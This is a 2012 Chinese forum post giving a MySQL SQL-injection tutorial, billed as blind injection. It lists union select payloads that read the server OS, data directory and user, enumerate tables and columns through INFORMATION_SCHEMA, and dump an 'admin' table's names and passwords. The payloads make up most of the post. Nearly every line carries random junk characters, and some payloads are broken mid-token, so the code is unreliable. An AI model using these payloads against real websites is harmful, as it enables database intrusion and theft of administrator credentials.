本文介绍MYSQL盲注的一些语句和方法) y1 Y( M0 ^+ E, y- E5 [3 u6 R# k+ a
6 O/ I0 F7 {& g
学习盲注前先了解下 IFORMATION_SCHEMA 库 S4 ]3 |; g# Q5 c- I
: _4 \$ J' S A$ ]. E( `
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
" w: [4 [5 b' ?6 C' _存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
! b/ p: f: u3 {, L, _1.得到所有数据库名:
' W) a5 `/ Q5 J|SCHEMATA ->存储数据库名的表
$ I) h) m* A# \& N& X* v( B2 Z|---字段:SCHEMA_NAME ->数据库名称8 Y* B; x( V. [: V& u+ v
6 w9 s; M4 h; Y, k|TABLES ->存储表名
( e# P! l, ]: H|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
+ a( m' t* D% b( O, a. a' Y|---字段:TABLE_NAME ->存储表的表名1 f- u+ e2 d) |: R5 P J/ g
6 o3 s! b5 I' a
|COLUMNS ->存储的字段名表0 {9 d+ u* Y9 ]9 K" s$ x
|---字段:TABLE_SCHEMA ->该字段所属数据库名
& B, J* s7 ]8 g7 H8 c- r|---字段:TABLE_NAME ->存储所属表的名称
' A, R/ K% R; C* u& c* ~8 c5 r. [' Q1 U/ x
|---字段:COLUMN_NAME ->该字段的名称
( ]- w& d7 n2 ^8 S
0 a" q/ n6 D. I& w k
# L5 a) p, N2 z# D. `- ]4 Y w; ~3 U: u( B/ {
###########################################################################& s1 k1 o, r1 [0 O- t
! b# W9 p$ A/ o' C9 |
0x001 获取系统信息:& ~7 ]% v' W+ `2 F& |$ i: V
# p Z S; t; ^; H2 M: K4 A
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*9 Z, K: [5 C! Q- T C
, c1 B; M2 p' S: Q4 j# s0 f1 X
/*2 X2 N! G3 ^7 z
$ {- B; W7 U4 A7 U& R8 N' S@@global.version_compile_os 获取系统版本( Y: L2 X+ G/ P
. h* D& U9 j/ X; Q7 \
@@datadir 数据库路径! E% E: n: ?* O, } b
database() 当前数据库名称
& t4 |6 ^: e$ m: b6 s2 U0x3c62723e 换行HEX值
! L' O Z; B& W7 W5 }3 e3 y+ N8 \, A$ q9 e0 S+ V5 G1 E" G8 p
*/5 E8 w8 B1 d& s% z) ?8 H0 T
* X% U( y+ _: ?8 r
: p! z& l9 d& Q1 G& ~0 F4 ]. b6 s
######################################################################3 {8 k/ E( Y6 ^& w$ `; b
5 n0 \1 B5 `3 _5 b7 S, _/ k# l
0x002 获取表名
- y9 _1 ]8 ^$ E7 `! q9 m- E" o1 K) P2 B' w& T# O
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
: \3 y/ e: y9 ^: j2 i2 v, ]* H. ^) ]$ [/ G( n& f
; J: K( s! t% ~" O& Y
% N7 ?9 Y8 F; G+ d f
/*! N! N& j& A' e; X$ l& ~" e1 k" S: T
4 ?6 H5 ^. Z$ n; A" l+ u0 N
0x67617264656e 为当前数据库名
$ B3 x1 I4 d9 m) t# G h+ b4 A9 {$ [: u; }: A8 F
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
% D+ }0 C' b, W+ C- l% n2 n& n: ]$ ]5 w& f; J( z
*/* S- e% g, i. t. b" @! w
/ w0 m" c0 Q3 x6 W) o$ S5 F
######################################################################& |5 g+ _* K+ q! ~; ]9 w4 C
4 G( H. v% T) ?0 _1 t0 l& y V1 [- X! }& `1 X; U
- h# k. {: i8 |4 S+ M0x003 获取字段) c* F8 W8 O% A n
/ S% C9 M+ y e6 t( E2 {union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
- p+ }7 e9 c9 b7 i
. o5 y3 s* h& D/ v) S/*
8 _0 l" W) D2 Q7 b& y7 T
( N1 u; t0 M! H& q( P# O) Fgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段& e3 W- D2 Z" c) X
; {5 }' C T: S$ K# _
0x61646d696e ->选择一个表
5 L+ [; U( |7 y7 E! g X) k- ^) F4 g6 y' q5 {" w& r2 M' ^
0x67617264656e ->数据库名
& g* E5 H8 v/ ~' n% Q: x
7 ?0 m0 u3 {9 Y: ?*/
5 C4 y. {0 r. f7 D. G( ^% M- Q
#####################################################################3 ~/ F. A$ q. e$ P! c$ |
: G3 a9 C* b* a
: S k# `6 A1 y- h7 z$ t2 l
6 p* {& c5 E- h. n0x004 获取数据
4 v/ h4 s. c7 _9 p$ \5 I( }" J* F9 c. q. B/ D
union select 1,2,35 C: M5 V M) {
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin) H# `$ H ~ |0 _- O2 C4 f5 C
( e7 k/ o7 o0 j2 T) e
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin+ I; H4 j; A8 p# P
; @6 F" \0 G0 q# g7 _* k) p8 y
+ S) O! Y: s x; h; P! i0 ]
; g: n5 @! \7 H- E! _/*. d7 Z$ c6 M" ]
2 r2 h+ k% O3 D( }" @0x3c62723e 换行符号HEX编码% p. K6 p1 z2 k6 t3 l
' Z; _! q( {4 N6 B. _group_concat 同时获得该字段所有数据& Z$ I4 ~" @" h
, |# p7 ?4 \" K4 K* A*/5 t5 s. N8 }3 ~
$ V6 G5 G1 W( N" {* Z1 Z. r/ \, M1 N
|
发表于 2012-9-13 17:48:44
收藏
支持
反对